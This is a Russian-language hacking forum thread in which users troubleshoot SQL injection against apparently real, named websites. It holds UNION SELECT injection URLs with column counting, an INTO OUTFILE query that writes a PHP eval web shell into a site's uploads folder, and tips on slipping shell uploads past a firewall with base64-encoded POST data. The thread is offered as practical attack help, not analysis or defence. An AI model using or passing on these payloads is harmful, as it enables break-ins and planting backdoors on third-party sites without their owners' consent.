а чем вас не устраивает limit? и с подобными вопросами наверное лудше было бы запостить в разделе по БД а не уязвимостей. _http://forum.antichat.ru/thread62769.html
пытаюсь править индекс, вставляю код, нажимаю save сайт выдает что делать? есть ли шеллы использующие метод ГЕТ?
Не поможет. Это обычный firewall так реагирует на левые данные в REQUEST запросах. Закодируй в base64 контент пост-запроса и запиши в файл уже раскодированный.
Так же часто промежуточный сервер блокирует такие данные, в том числе и с большим объёмом. А вообще WSO постоянно использует POST(Шелл не работал бы вообще), а у GET длина ограничена(Не получиться передать нужный объём).
В чем ошибка ? Code: select '<?php eval($_REQUEST[cmd]); ?>' from mysql.user into outfile '/var/www/uprgroup/data/www/upr-group.ru/images/uploads2/test.php'
через запрос в скуле? или через пыху заливаешь? файл_прив есть положительное? папка доступна для записи?
Может в том, что пыху не понятно, что такое cmd? $_REQUEST[cmd] - обращение к массиву по глобальной переменной или хз ещё чему, которой не существует. Кавычки в общем надо. from mysql.user - нужно убрать вообще
Code: Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 0, 100' at line 1 Query: select 'test' from mysql.user into outfile '/var/data/www/site/images/test.php' LIMIT 0, 100
http://www.pmrs.ps/last/etemplate.php?id=-249+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20+ вот так вот и надо...как обычную
Глупости, отработает и так Не всегда, только если mysql не старый. wkar у тебя файл не создаётся, варианта три: 1 Нет прав на запись 2 Нет прав на операции с файлами (файлприва тоесть) 3 Путь не верный -------- upd Этого не заметил А откуда лимит-то? Менеджер добавляет наверное? Так срежь его )
Разьясните пожалуста что здесь не так? Code: -ttp://www.site.xx/mesto.php?id=1+GROUP+BY+92+--+ все ок 92 далее ставлю -ttp://www.site.xx/mesto.php?id=1851+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92+--+ ответ The used SELECT statements have a different number of columns и ошибка... union+select получается не работает?
ты когда +GROUP+BY+92+--+ ставишь, что тебя что открывается? если сам сайт, то пропробуй +GROUP+BY+95+--+ там полей может быть больше 92
полей получается 92. (сайт виден) вот запрос на 93 выдает (Unknown column '93' in 'group statement') вот пример Code: http://www.mesta-vstrech.ru/mesto.php?id=1+GROUP+BY+93+--+
